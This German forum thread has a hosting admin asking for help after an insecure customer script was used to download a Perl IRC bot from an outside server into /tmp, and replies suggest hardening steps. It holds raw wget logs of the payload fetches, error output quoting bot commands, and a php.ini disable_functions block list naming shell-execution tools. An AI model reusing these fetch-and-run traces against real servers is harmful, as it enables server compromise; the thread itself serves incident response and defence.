Hack-Angriff auf Server, Linuxdaybot, Kundenscripts - was tun?

[shapeshift]

Hi,
vermutlich durch ein unsicheres kundenscript (asche auf mein haupt ich weiss, ich denke es lag an phpBB oder einer Fotogalerie), wurde versucht einen Bot zu installieren, bzw. den server auch als datenschleuder zu missbrauchen:

Code: Select all

--16:20:43--  http://www.precisa-se.com.br/curriculos/linuxday.txt
           => `/tmp/.aprVWpZP8'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,102 [text/plain]

    0K ....                                                  100%   31.25 KB/s

16:20:44 (31.25 KB/s) - `/tmp/.aprVWpZP8' saved [4102/4102]

--16:20:45--  http://www.precisa-se.com.br/curriculos/linuxday.txt
           => `/tmp/.aprVWpZP8'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,102 [text/plain]

    0K ....                                                  100%   29.47 KB/s

16:20:46 (29.47 KB/s) - `/tmp/.aprVWpZP8' saved [4102/4102]

--16:20:53--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,392 [text/plain]

    0K .......... ........                                   100%   73.97 KB/s

16:20:53 (73.97 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

--16:20:55--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,392 [text/plain]

    0K .......... ........                                   100%   69.38 KB/s

16:20:56 (69.38 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

--16:20:56--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,392 [text/plain]

    0K .......... ........                                   100%   73.09 KB/s

16:20:57 (73.09 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

--16:20:57--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,392 [text/plain]

    0K .......... ........                                   100%   72.72 KB/s

Code: Select all

Connecting to www.precisa-se.com.br[204.16.1.127]:80... ......connected.
HTTP request sent, awaiting response... .. ........                                   100%   68.58 KB/s

16:56:16 (68.58 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

200 OK
Length: 19,392 [text/plain]

    0K ..syntax error at /tmp/.aprVWpZP9 line 103, at EOF
Missing right curly or square bracket at /tmp/.aprVWpZP9 line 103, at end of line
Execution of /tmp/.aprVWpZP9 aborted due to compilation errors.
......--16:56:17--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... .. ........                                   100%   68.76 KB/s

16:56:17 (68.76 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

String found where operator expected at /tmp/.aprVWpZP9 line 3, near "devoice(""
  (Might be a runaway multi-line "" string starting on line 1)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 3, near "devoice("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 3, near "$1", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 3, near "", "$2"
	(Missing operator before $2?)
String found where operator expected at /tmp/.aprVWpZP9 line 6, near "msg(""
  (Might be a runaway multi-line "" string starting on line 3)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 6, near "msg("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 6, near "$1", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 6, near "", "$2"
	(Missing operator before $2?)
String found where operator expected at /tmp/.aprVWpZP9 line 10, near "msg(""
  (Might be a runaway multi-line "" string starting on line 6)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 10, near "msg("$2"
String found where operator expected at /tmp/.aprVWpZP9 line 10, near "$2", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 10, near "", "$3"
	(Missing operator before $3?)
String found where operator expected at /tmp/.aprVWpZP9 line 14, near "ctcp(""
  (Might be a runaway multi-line "" string starting on line 10)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 14, near "ctcp("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 14, near "$1", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 14, near "", "$2"
	(Missing operator before $2?)
String found where operator expected at /tmp/.aprVWpZP9 line 18, near "ctcp(""
  (Might be a runaway multi-line "" string starting on line 14)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 18, near "ctcp("$2"
String found where operator expected at /tmp/.aprVWpZP9 line 18, near "$2", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 18, near "", "$3"
	(Missing operator before $3?)
String found where operator expected at /tmp/.aprVWpZP9 line 22, near "invite(""
  (Might be a runaway multi-line "" string starting on line 18)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 22, near "invite("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 22, near "$1", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 22, near "", "$2"
	(Missing operator before $2?)
String found where operator expected at /tmp/.aprVWpZP9 line 25, near "nick(""
  (Might be a runaway multi-line "" string starting on line 22)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 25, near "nick("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 28, near "conectar(""
  (Might be a runaway multi-line "" string starting on line 25)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 28, near "conectar("$2"
String found where operator expected at /tmp/.aprVWpZP9 line 28, near "$2", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 28, near "", "$1"
	(Missing operator before $1?)
String found where operator expected at /tmp/.aprVWpZP9 line 31, near "DCC::SEND(""
  (Might be a runaway multi-line "" string starting on line 28)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 31, near "DCC::SEND("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 31, near "$1", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 31, near "", "$2"
	(Missing operator before $2?)
String found where operator expected at /tmp/.aprVWpZP9 line 34, near "sendraw(""
  (Might be a runaway multi-line "" string starting on line 31)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 34, near "sendraw("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 37, near "eval ""
  (Might be a runaway multi-line "" string starting on line 34)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 37, near "eval "$1"
	(Do you need to predeclare eval?)
String found where operator expected at /tmp/.aprVWpZP9 line 45, near "chdir(""
  (Might be a runaway multi-line "" string starting on line 37)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 45, near "chdir("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 45, near "$1") || msg(""
	(Missing operator before ") || msg("?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 45, near "") || msg("$printl"
	(Missing operator before $printl?)
String found where operator expected at /tmp/.aprVWpZP9 line 45, near "$printl", ""
	(Missing operator before ", "?)
Bareword found where operator expected at /tmp/.aprVWpZP9 line 45, near "", "Diert"
	(Missing operator before Diert?)
syntax error at /tmp/.aprVWpZP9 line 3, near "devoice(""
Unrecognized character xF3 at /tmp/.aprVWpZP9 line 45.
connected.
HTTP request sent, awaiting response... --16:56:17--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... 200 OK
Length: 19,392 [text/plain]

    0K ..connected.
HTTP request sent, awaiting response... ......200 OK
Length: 19,392 [text/plain]

    0K .... ........                                   100%   72.11 KB/s

16:56:17 (72.11 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

......syntax error at /tmp/.aprVWpZP9 line 103, next token ???
syntax error at /tmp/.aprVWpZP9 line 103, near "@adms) "
Execution of /tmp/.aprVWpZP9 aborted due to compilation errors.
.. ........                                   100%   73.01 KB/s

16:56:17 (73.01 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

--16:56:18--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,392 [text/plain]

    0K .......... ........                                   100%   71.84 KB/s

16:56:18 (71.84 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

php safe mode ist für den kunden aktiviert.
im kundenverzeichnis lag ausserdem eine 15MB große RAR-Datei, die da nix zu suchen hat, hab aber den kunden bisher nicht erreicht um zu fragen ob er es hochgeladen hat (lt. transferlog via FTP von diesem Benutzer hochgeladen).

Da mein Admin im Urlaub ist, hab ich jetzt erstmal mit meinen Grundkenntnissen folgendes gemacht:

- unsicheres Script upgedatet
- php.ini allow_url_fopen = Off
- Logs gesichert
- nach verdächtigen Prozessen geschaut (nix gefunden)
- nach anderen großen Files gesucht (nix gefunden)
- tmp-verzeichnisse gecheckt (nix was da nicht hingehört)
- Server ins Rescue
- Passwörter geändert

Wie genau konnte der User die Dateien auf dem Server platzieren,
also wie konnte er zugriff erlangen?

Was kann ich noch tun im Moment? Wo sehe ich wie und in welchem umfang er sich tatsächlich zugriff verschafft hat und den bot installiert hat?

Da ich confixx nutzen muss für einige kunden (sie wollen emails/webftp usw. selbst verwalten), muss ich nach dem neuaufsetzen alle patches per hand einspielen, würd gern auf PHP 4.4.X updaten, wie muss ich dabei vorgehen - yast bietet ja direkt keine "echten" updates an (online update macht wohl nur bugfixing??)

Das System wird zusammen mit dem Admin in einigen Tagen neu aufgesetzt, was kann ich dabei noch zusätzlich beachten?

Danke!

[aubergine]

http://www.rootforum.org/forum/viewtopic.php?t=38263

Hier ist ein sehr ähnliches Thema

[shapeshift]

ja danke, schon geschaut. mod_security + rules werd ich wohl nehmen.
mich würd trotzdem mal der weg des unberechtigten zugriffs auf meinen server interessieren (wo kann ich evtl. sehen welche sicherheitslücke wie ausgenutzt wurde und was genau gemacht wurde - sofern das noch nachvollziehbar ist).

[lord_pinhead]

Wenn Safemode aktiv war und du noch die Disabled Funktions nutzt, dürfte da nichts passieren

php.ini

Code: Select all

disable_functions = exec,passthru,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,system,set_time_limit,apache_note,apache_setenv,closelog,debugger_off,debugger_on,define_syslog_variables,openlog,syslog,popen,pclose,wget,curl,puf

Was ich noch machen würde, ist in der fstab die richtigen Mountoptionen zu setzen, dann ist /tmp wenigstens nicht nackt. Lass mal rkhunter und chkrootkit durchlaufen, vielleicht hat der Angreifer bestimmte Binarys ersetzen können, ps, netstat, find usw. sind beliebt beim ersetzen.

[shapeshift]

ja die php.ini / disabled_functions hab ich zwischenzeitlich angepasst, werd aber noch die von dir genannten funktionen hinzufügen, bei mir waren es weniger - danke!

die mountoptionen werd ich auch noch setzen. muss mich da sowieso gründlicher einlesen, damit ich auch selbst und sicher Ã?nderungen durchführen kann - auch ohne Admin.

ach ja und die 15MB Datei war vom Kunden, also konnte der Angreifer ausschliesslich aufs TMP Verzeichnis zugreifen.